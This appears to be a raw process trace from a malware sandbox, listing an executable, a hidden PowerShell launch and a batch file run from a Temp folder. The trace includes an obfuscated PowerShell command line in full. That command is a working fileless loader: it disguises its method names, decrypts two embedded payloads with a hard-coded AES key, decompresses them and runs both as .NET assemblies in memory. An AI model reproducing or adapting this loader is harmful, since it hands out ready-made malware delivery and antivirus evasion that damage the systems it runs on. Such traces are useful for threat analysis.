bonder.exe

powershell.exe powershell -w hidden -c #

man.bat.exe "C:\Users\test22\AppData\Local\Temp\man.bat.exe" $OBOu='SplNbqLitNbqL'.Replace('NbqL', '');$aqEU='ReNbqLadLNbqLinNbqLeNbqLsNbqL'.Replace('NbqL', '');$wFvO='FiNbqLrstNbqL'.Replace('NbqL', '');$uTAD='CNbqLreNbqLatNbqLeNbqLDecrNbqLypNbqLtoNbqLrNbqL'.Replace('NbqL', '');$SyvP='InNbqLvNbqLokNbqLeNbqL'.Replace('NbqL', '');$wpRJ='EntNbqLryPoNbqLinNbqLtNbqL'.Replace('NbqL', '');$leFV='TrNbqLaNbqLnsNbqLfoNbqLrmNbqLFinaNbqLlBloNbqLckNbqL'.Replace('NbqL', '');$KiSR='MaNbqLiNbqLnMoNbqLdulNbqLeNbqL'.Replace('NbqL', '');$jrfh='ChanNbqLgeENbqLxteNbqLnsiNbqLoNbqLnNbqL'.Replace('NbqL', '');$LVNY='LoaNbqLdNbqL'.Replace('NbqL', '');$ZsxI='FNbqLromNbqLBasNbqLe64SNbqLtrNbqLingNbqL'.Replace('NbqL', '');$nhRS='GetNbqLCuNbqLrNbqLrNbqLenNbqLtProNbqLcNbqLesNbqLsNbqL'.Replace('NbqL', '');function jtNeP($BFDih){$ZgaCl=[System.Security.Cryptography.Aes]::Create();$ZgaCl.Mode=[System.Security.Cryptography.CipherMode]::CBC;$ZgaCl.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$ZgaCl.Key=[System.Convert]::$ZsxI('txkNVDrhm27W1DaL5GLcM6FMILoKtFqLKX3laNnOjxc=');$ZgaCl.IV=[System.Convert]::$ZsxI('hP/b1mKCdVvyfRQZ/p25ZA==');$AdWGs=$ZgaCl.$uTAD();$EqYkj=$AdWGs.$leFV($BFDih,0,$BFDih.Length);$AdWGs.Dispose();$ZgaCl.Dispose();$EqYkj;}function QcgQb($BFDih){$Hnmle=New-Object System.IO.MemoryStream(,$BFDih);$xRoFm=New-Object System.IO.MemoryStream;$pEUyF=New-Object System.IO.Compression.GZipStream($Hnmle,[IO.Compression.CompressionMode]::Decompress);$pEUyF.CopyTo($xRoFm);$pEUyF.Dispose();$Hnmle.Dispose();$xRoFm.Dispose();$xRoFm.ToArray();}$NdNoC=[System.Linq.Enumerable]::$wFvO([System.IO.File]::$aqEU([System.IO.Path]::$jrfh([System.Diagnostics.Process]::$nhRS().$KiSR.FileName, $null)));$UfGsn=$NdNoC.Substring(3).$OBOu(':');$WZNSc=QcgQb (jtNeP ([Convert]::$ZsxI($UfGsn[0])));$hKWvJ=QcgQb (jtNeP ([Convert]::$ZsxI($UfGsn[1])));[System.Reflection.Assembly]::$LVNY([byte[]]$hKWvJ).$wpRJ.$SyvP($null,$null);[System.Reflection.Assembly]::$LVNY([byte[]]$WZNSc).$wpRJ.$SyvP($null,$null);